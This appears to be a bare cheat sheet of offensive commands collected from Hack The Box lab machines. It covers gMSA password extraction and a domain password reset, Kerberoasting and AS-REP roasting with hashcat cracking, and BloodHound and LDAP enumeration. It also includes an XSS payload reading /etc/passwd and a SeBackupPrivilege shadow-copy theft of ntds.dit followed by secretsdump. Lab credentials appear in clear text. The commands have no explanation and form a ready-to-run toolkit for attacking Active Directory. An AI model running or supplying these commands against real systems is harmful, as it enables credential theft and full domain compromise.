$gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
#make the password into variable
$c = ConvertFrom-ADManagedPasswordBlob $mp
$username ="BIR-ADFS-GMSA";
$password = $c.SecureCurrentPassword;
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $username, $password;
Invoke-Command -ScriptBlock { whoami } -ComputerName RESEARCH -Credential $cred
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies bunnys666 /domain}
GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?' -request -dc-ip 10.10.11.129 -outputfile hash
GetNPUsers.py BLACKFIELD.local/ -usersfile usernames.txt -format hashcat -dc-ip 10.10.10.192 -outputfile AS-REP
hashcat -m 18200 -a 0 AS-REP ~/Desktop/htb-tool/rockyou.txt
./bloodhound.py -d search.htb -u hope.sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -c all
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
ldapsearch -x -h $ip -D '' -w '' -b "DC=cascade,DC=local" > ldap.log
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
smbget -R smb://audit2020:'Password123'@10.10.10.192/forensic/memory_analysis/lsass.zip
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
#evil-winrm
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll
# import module cmdlets command
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\temp\ntds.dit -Overwrite
reg save HKLM\SYSTEM c:\temp\
secretsdump.py -ntds ntds.dit -system system -just-dc LOCAL
dnsenum --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt realcorp.htb -u z -v
kadmin -kt /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB